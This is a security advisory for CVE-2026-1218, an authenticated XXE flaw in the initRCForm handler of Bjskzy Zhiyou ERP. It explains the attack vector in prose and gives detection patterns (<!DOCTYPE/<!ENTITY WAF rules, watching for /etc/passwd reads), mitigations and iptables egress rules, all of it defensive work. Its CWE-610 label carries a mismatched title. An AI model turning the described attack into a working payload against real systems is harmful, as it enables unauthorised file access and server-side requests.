CVE-2026-1218: Bjskzy Zhiyou ERP XXE Vulnerability

CVE-2026-1218 Overview

CVE-2026-1218 is an XML External Entity (XXE) vulnerability affecting Bjskzy Zhiyou ERP versions up to 11.0. The flaw resides in the initRCForm function of RichClientService.class within the com.artery.richclient.RichClientService component. An authenticated remote attacker can manipulate XML input processed by this function to trigger external entity reference resolution [CWE-610]. A public proof-of-concept exploit exists on GitHub. The vendor was contacted prior to disclosure but did not respond.

Critical Impact

Remote attackers with low privileges can leverage XXE processing in the initRCForm handler to access restricted resources or trigger out-of-band requests from the ERP server.

Affected Products

• Bjskzy Zhiyou ERP versions up to and including 11.0
• Component: com.artery.richclient.RichClientService
• File: RichClientService.class (function initRCForm)

Discovery Timeline

• 2026-01-20 - CVE-2026-1218 published to the National Vulnerability Database (NVD)
• 2026-04-29 - Last updated in NVD database

Technical Details for CVE-2026-1218

Vulnerability Analysis

The vulnerability is classified as External Control of File Name or Path issues related to XML processing [CWE-610]. The initRCForm function in RichClientService.class parses XML input without disabling external entity resolution. Attackers submit crafted XML payloads containing DOCTYPE declarations that reference external entities. The XML parser dereferences these entities during processing, enabling unauthorized data access or out-of-band interactions.

The issue affects confidentiality, integrity, and availability at limited levels according to the CVSS 4.0 vector. Authentication is required, but no user interaction is needed. The attack proceeds over the network against the ERP service endpoint exposing the RichClient interface.

Root Cause

The root cause is improper configuration of the XML parser used by initRCForm. The parser accepts external entity declarations and DTD processing by default. Secure XML processing requires explicit disabling of DOCTYPE declarations, external general entities, and external parameter entities. The absence of these protections allows attacker-controlled entity URIs to be resolved by the server.

Attack Vector

An authenticated attacker sends a crafted XML request to the RichClientService endpoint invoking initRCForm. The XML payload includes an external entity definition pointing to a local file path or attacker-controlled URL. When the server parses the XML, it resolves the entity and includes its contents in subsequent processing or outbound requests. Refer to the GitHub PoC for the XXE vulnerability for the proof-of-concept details.

No verified sanitized code example is available. The publicly disclosed PoC documents the XML payload structure used against the initRCForm handler.

Detection Methods for CVE-2026-1218

Indicators of Compromise

• Inbound HTTP requests to the RichClientService endpoint containing XML payloads with <!DOCTYPE or <!ENTITY declarations.
• Unexpected outbound DNS lookups or HTTP requests from the ERP server to unknown external hosts.
• Application logs showing XML parsing errors or unexpected file read operations under the ERP service account.

Detection Strategies

• Inspect web application firewall (WAF) and proxy logs for XML requests containing external entity references targeting /RichClientService or initRCForm.
• Monitor the ERP host for anomalous file access patterns to sensitive paths such as /etc/passwd or Windows configuration files initiated by the Java process.
• Correlate authenticated session activity with outbound network connections originating from the ERP application process.

Monitoring Recommendations

• Enable verbose logging on the com.artery.richclient.RichClientService component to capture incoming XML payloads.
• Forward ERP application logs and network flow data to a centralized SIEM for correlation against XXE signatures.
• Establish baselines for outbound connections from ERP servers and alert on deviations.

How to Mitigate CVE-2026-1218

Immediate Actions Required

• Restrict network access to the RichClientService endpoint using firewall rules or reverse proxy ACLs until a patch is available.
• Audit ERP user accounts and revoke unnecessary privileges that could enable authenticated XXE exploitation.
• Review historical logs for evidence of prior exploitation attempts referencing initRCForm.

Patch Information

The vendor was contacted regarding this disclosure but did not respond. No official patch is currently referenced in the NVD entry or the VulDB advisory #341908. Organizations should monitor vendor channels for updates and apply any forthcoming patches immediately.

Workarounds

• Deploy a WAF rule blocking XML requests containing <!DOCTYPE or <!ENTITY directives sent to the ERP RichClientService endpoint.
• If feasible, disable or remove the RichClientService component when not required by business workflows.
• Place the ERP server behind a network egress filter that denies outbound connections to untrusted destinations, limiting out-of-band XXE impact.

# Example egress filtering with iptables to limit outbound connections from ERP host
iptables -A OUTPUT -p tcp --dport 80 -m owner --uid-owner erpuser -j REJECT
iptables -A OUTPUT -p tcp --dport 443 -m owner --uid-owner erpuser -d trusted.example.com -j ACCEPT
iptables -A OUTPUT -p tcp -m owner --uid-owner erpuser -j REJECT